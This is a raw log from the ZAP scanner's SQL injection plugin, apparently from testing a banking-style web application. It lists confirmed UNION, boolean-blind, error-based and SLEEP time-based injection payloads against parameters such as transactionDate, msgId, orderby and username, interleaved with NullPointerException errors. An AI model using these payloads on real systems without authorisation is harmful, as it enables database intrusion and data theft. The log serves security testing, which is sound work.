org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - target url appears to have 3 column in query 9351238 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - [UNION-BASED Injection Found] MySQL UNION query (NULL) - 1 to 10 columns with payload [1 #] on parameter 'msgId' 9351239 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 9351330 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - [BOOLEAN-BASED Injection Found] MySQL >= 5.0 boolean-based blind - Parameter replace with payload [(SELECT (CASE WHEN (5979=5979) THEN 5979 ELSE 5979*(SELECT 5979 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))] on parameter 'transactionDate' 9351331 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 9351365 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - [ERROR-BASED Injection Found] MySQL >= 5.0 error-based - Parameter replace with payload [(SELECT 4653 FROM(SELECT COUNT(*),CONCAT(0x3a7861623a,(SELECT (ELT(4653=4653,1))),0x3a7561713a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)] on parameter 'transactionDate' 9351366 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 9351586 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - [TIME-BASED Injection Found] MySQL >= 5.0.12 AND time-based blind (SELECT) with payload [1 AND (SELECT * FROM (SELECT(SLEEP(5)))Ylku)-- Teyg] on parameter 'transactionId' 9351587 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 9351602 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test 9351606 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - target url appears to have 4 column in query 9351640 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test 9351644 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - target url appears to have 4 column in query 9351663 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test 9351668 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - target url appears to have 4 column in query 9351669 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - [UNION-BASED Injection Found] MySQL UNION query (NULL) - 1 to 10 columns with payload [1 #] on parameter 'transactionId' 9351670 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 9351762 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - [ERROR-BASED Injection Found] MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause with payload [2010-02-02' AND (SELECT 4879 FROM(SELECT COUNT(*),CONCAT(0x3a7861623a,(SELECT (ELT(4879=4879,1))),0x3a7561713a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'EUDt'='EUDt] on parameter 'transactionDate' 9351763 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 9361397 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - [TIME-BASED Injection Found] MySQL >= 5.0.12 AND time-based blind (SELECT) with payload [2010-01-01 AND (SELECT * FROM (SELECT(SLEEP(5)))zKCz)] on parameter 'transactionDate' 9361398 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 9361412 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test 9361416 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - target url appears to have 4 column in query 9361448 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test 9361452 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - target url appears to have 4 column in query 9361469 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test 9361472 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - target url appears to have 4 column in query 9361474 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - [UNION-BASED Injection Found] MySQL UNION query (NULL) - 1 to 10 columns with payload [2010-01-01 #] on parameter 'transactionDate' 9361474 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 9361535 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - [BOOLEAN-BASED Injection Found] AND boolean-based blind - WHERE or HAVING clause with payload [2010-01-01' AND 5318=5318 AND 'ibla'='ibla] on parameter 'transactionDate' 9361536 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 9361542 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - [ERROR-BASED Injection Found] MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause with payload [2010-01-01' AND (SELECT 7914 FROM(SELECT COUNT(*),CONCAT(0x3a7861623a,(SELECT (ELT(7914=7914,1))),0x3a7561713a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'TUhP'='TUhP] on parameter 'transactionDate' 9361543 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 9361817 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - [TIME-BASED Injection Found] MySQL >= 5.0.12 AND time-based blind (SELECT) with payload [2010-02-02' AND (SELECT * FROM (SELECT(SLEEP(5)))yAQH) AND 'hhsq'='hhsq] on parameter 'transactionDate' 9361818 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 9362133 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - [BOOLEAN-BASED Injection Found] AND boolean-based blind - WHERE or HAVING clause with payload [2010-01-01' AND 6691=6691 AND 'rQJs'='rQJs] on parameter 'transactionDate' 9362136 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 9362140 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - [ERROR-BASED Injection Found] MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause with payload [2010-01-01' AND (SELECT 3466 FROM(SELECT COUNT(*),CONCAT(0x3a7861623a,(SELECT (ELT(3466=3466,1))),0x3a7561713a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'zqDe'='zqDe] on parameter 'transactionDate' 9362141 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 9371608 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - [TIME-BASED Injection Found] MySQL >= 5.0.12 AND time-based blind (SELECT) with payload [2010-01-01' AND (SELECT * FROM (SELECT(SLEEP(5)))DoKb) AND 'bncR'='bncR] on parameter 'transactionDate' 9371609 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 9371647 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test 9371652 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - target url appears to have 1 column in query 9371657 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test 9371661 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - target url appears to have 1 column in query 9371714 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test 9371720 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - target url appears to have 1 column in query 9371723 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test 9371728 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - target url appears to have 1 column in query 9371948 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - [BOOLEAN-BASED Injection Found] MySQL >= 5.0 boolean-based blind - Parameter replace with payload [(SELECT (CASE WHEN (8240=8240) THEN 8240 ELSE 8240*(SELECT 8240 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))] on parameter 'orderby' 9371949 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 9371952 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - [ERROR-BASED Injection Found] MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause with payload [1 AND (SELECT 5339 FROM(SELECT COUNT(*),CONCAT(0x3a7861623a,(SELECT (ELT(5339=5339,1))),0x3a7561713a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)] on parameter 'orderby' 9371962 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 9372397 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - [TIME-BASED Injection Found] MySQL >= 5.0.12 AND time-based blind (SELECT) with payload [2010-01-01' AND (SELECT * FROM (SELECT(SLEEP(5)))Waat) AND 'FXJs'='FXJs] on parameter 'transactionDate' 9372399 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 9372529 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - [UNION-BASED Injection Found] MySQL UNION query (NULL) - 1 to 10 columns with payload [2010-01-01' #] on parameter 'transactionDate' 9372530 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 9372741 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - [BOOLEAN-BASED Injection Found] AND boolean-based blind - WHERE or HAVING clause with payload [2010-01-01' AND 2933=2933 AND 'FeFU'='FeFU] on parameter 'transactionDate' 9372742 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 9372749 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - [ERROR-BASED Injection Found] MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause with payload [2010-01-01' AND (SELECT 5612 FROM(SELECT COUNT(*),CONCAT(0x3a7861623a,(SELECT (ELT(5612=5612,1))),0x3a7561713a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'pbbG'='pbbG] on parameter 'transactionDate' 9372749 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 9381988 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - [TIME-BASED Injection Found] MySQL >= 5.0.12 AND time-based blind (SELECT) with payload [1 AND (SELECT * FROM (SELECT(SLEEP(5)))ZEXE)] on parameter 'orderby' 9381989 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 9382176 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - [BOOLEAN-BASED Injection Found] MySQL >= 5.0 boolean-based blind - Parameter replace with payload [(SELECT (CASE WHEN (3772=3772) THEN 3772 ELSE 3772*(SELECT 3772 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))] on parameter 'msgid' 9382176 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 9382179 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - [ERROR-BASED Injection Found] MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause with payload [1 AND (SELECT 2756 FROM(SELECT COUNT(*),CONCAT(0x3a7861623a,(SELECT (ELT(2756=2756,1))),0x3a7561713a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)] on parameter 'msgid' 9382179 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 9382784 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - [TIME-BASED Injection Found] MySQL >= 5.0.12 AND time-based blind (SELECT) with payload [2010-01-01' AND (SELECT * FROM (SELECT(SLEEP(5)))GWVR) AND 'FJrP'='FJrP] on parameter 'transactionDate' 9382785 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 9382925 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - [UNION-BASED Injection Found] MySQL UNION query (NULL) - 1 to 10 columns with payload [2010-01-01' #] on parameter 'transactionDate' 9382926 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 9382956 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - [BOOLEAN-BASED Injection Found] AND boolean-based blind - WHERE or HAVING clause with payload [10000 AND 8329=8329] on parameter 'minBalanace' 9382957 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 9382959 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - [ERROR-BASED Injection Found] MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause with payload [10000 AND (SELECT 9303 FROM(SELECT COUNT(*),CONCAT(0x3a7861623a,(SELECT (ELT(9303=9303,1))),0x3a7561713a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)] on parameter 'minBalanace' 9382960 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 9392211 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - [TIME-BASED Injection Found] MySQL >= 5.0.12 AND time-based blind (SELECT) with payload [1 AND (SELECT * FROM (SELECT(SLEEP(5)))KAWK)] on parameter 'msgid' 9392212 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 9392588 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - [BOOLEAN-BASED Injection Found] MySQL >= 5.0 boolean-based blind - Parameter replace with payload [(SELECT (CASE WHEN (8895=8895) THEN 8895 ELSE 8895*(SELECT 8895 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))] on parameter 'transactionId' 9392589 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 9392615 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - [ERROR-BASED Injection Found] MySQL >= 5.0 error-based - Parameter replace with payload [(SELECT 2212 FROM(SELECT COUNT(*),CONCAT(0x3a7861623a,(SELECT (ELT(2212=2212,1))),0x3a7561713a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)] on parameter 'transactionId' 9392616 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 9392992 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - [TIME-BASED Injection Found] MySQL >= 5.0.12 AND time-based blind (SELECT) with payload [10000 AND (SELECT * FROM (SELECT(SLEEP(5)))fjSR)] on parameter 'minBalanace' 9392993 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 9393006 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test 9393012 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - target url appears to have 1 column in query 9393046 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test 9393052 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - target url appears to have 1 column in query 9393066 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test 9393073 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - target url appears to have 1 column in query 9393117 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test 9393121 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - target url appears to have 1 column in query 9393177 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - [BOOLEAN-BASED Injection Found] MySQL >= 5.0 boolean-based blind - Parameter replace with payload [(SELECT (CASE WHEN (7965=7965) THEN 7965 ELSE 7965*(SELECT 7965 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))] on parameter 'msgId' 9393178 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 9393180 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - [ERROR-BASED Injection Found] MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause with payload [1 AND (SELECT 2635 FROM(SELECT COUNT(*),CONCAT(0x3a7861623a,(SELECT (ELT(2635=2635,1))),0x3a7561713a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)] on parameter 'msgId' 9393181 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 9402653 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - [TIME-BASED Injection Found] MySQL >= 5.0.12 AND time-based blind (SELECT) with payload [1 AND (SELECT * FROM (SELECT(SLEEP(5)))QvDd)-- NjLW] on parameter 'transactionId' 9402655 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 9402670 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test 9402673 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - target url appears to have 4 column in query 9402725 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test 9402729 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - target url appears to have 4 column in query 9402747 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test 9402751 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - target url appears to have 4 column in query 9402752 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - [UNION-BASED Injection Found] MySQL UNION query (NULL) - 1 to 10 columns with payload [1 #] on parameter 'transactionId' 9402753 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 9403091 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'msg' is not injectable 9403189 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - [BOOLEAN-BASED Injection Found] MySQL >= 5.0 boolean-based blind - Parameter replace with payload [(SELECT (CASE WHEN (9867=9867) THEN 9867 ELSE 9867*(SELECT 9867 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))] on parameter 'orderby' 9403190 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 9403192 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - [ERROR-BASED Injection Found] MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause with payload [msgid AND (SELECT 8909 FROM(SELECT COUNT(*),CONCAT(0x3a7861623a,(SELECT (ELT(8909=8909,1))),0x3a7561713a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)] on parameter 'orderby' 9403193 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 9403212 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - [TIME-BASED Injection Found] MySQL >= 5.0.12 AND time-based blind (SELECT) with payload [1 AND (SELECT * FROM (SELECT(SLEEP(5)))pyjf)] on parameter 'msgId' 9403213 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 9403324 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - [UNION-BASED Injection Found] MySQL UNION query (NULL) - 1 to 10 columns with payload [1 #] on parameter 'msgId' 9403325 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 9403394 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - [ERROR-BASED Injection Found] MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause with payload [ZAP%' AND (SELECT 7449 FROM(SELECT COUNT(*),CONCAT(0x3a7861623a,(SELECT (ELT(7449=7449,1))),0x3a7561713a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND '%'='] on parameter 'msg' 9403395 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 9413225 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - [TIME-BASED Injection Found] MySQL >= 5.0.12 AND time-based blind (SELECT) with payload [msgid AND (SELECT * FROM (SELECT(SLEEP(5)))vgAh)] on parameter 'orderby' 9413226 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 9413429 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - [TIME-BASED Injection Found] MySQL >= 5.0.12 AND time-based blind (SELECT) with payload [ZAP%' AND (SELECT * FROM (SELECT(SLEEP(5)))CUUs) AND '%'='] on parameter 'msg' 9413430 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 9413482 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test 9413486 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - target url appears to have 3 column in query 9413556 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test 9413562 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - target url appears to have 3 column in query 9413563 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - [UNION-BASED Injection Found] MySQL UNION query (NULL) - 1 to 10 columns with payload [ZAP' #] on parameter 'msg' 9413564 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 9423485 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - [TIME-BASED Injection Found] MySQL >= 5.0.12 AND time-based blind (SELECT) with payload [ZAP' AND (SELECT * FROM (SELECT(SLEEP(5)))UslL) AND 'ApbU'='ApbU] on parameter 'username' 9423488 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 9423536 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test 9423541 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - target url appears to have 1 column in query 9423543 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test 9423550 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - target url appears to have 1 column in query 9423597 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test 9423602 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - target url appears to have 1 column in query 9423605 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test 9423612 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - target url appears to have 1 column in query 9423654 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - [TIME-BASED Injection Found] MySQL >= 5.0.12 AND time-based blind (SELECT) with payload [ZAP' AND (SELECT * FROM (SELECT(SLEEP(5)))PkNA) AND 'OkRu'='OkRu] on parameter 'username' 9423655 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 9423694 